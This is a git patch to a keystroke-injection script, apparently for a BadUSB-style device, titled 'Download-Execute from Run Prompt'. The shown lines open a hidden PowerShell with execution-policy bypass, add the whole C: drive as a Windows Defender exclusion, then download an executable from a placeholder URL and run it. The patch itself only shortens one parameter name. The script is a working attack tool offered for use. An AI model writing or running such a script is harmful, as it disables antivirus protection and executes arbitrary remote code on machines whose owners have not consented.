From 3ca8c8ffd301a164295004d9c2e64bb9ebe6d573 Mon Sep 17 00:00:00 2001 From: beigeworm <93350544+beigeworm@users.noreply.github.com> Date: Sun, 25 Jun 2023 14:04:44 +0000 Subject: [PATCH] Update Download-Execute from Run Prompt.txt --- Tools/Download-Execute from Run Prompt.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Tools/Download-Execute from Run Prompt.txt b/Tools/Download-Execute from Run Prompt.txt index 2081f86..30b7398 100644 --- a/Tools/Download-Execute from Run Prompt.txt +++ b/Tools/Download-Execute from Run Prompt.txt @@ -15,7 +15,7 @@ DELAY 750 STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C cd $env:Temp;Add-MpPreference -ExclusionPath C:\;Start-Sleep 1; REM replace FILE_URL_HERE below. -STRING iwr -Uri FILE_URL_HERE -OutFile upl.exe;Start-Sleep 1;Start upl.exe;exit +STRING iwr -Uri FILE_URL_HERE -O upl.exe;Start-Sleep 1;Start upl.exe;exit CTRL-SHIFT ENTER DELAY 1500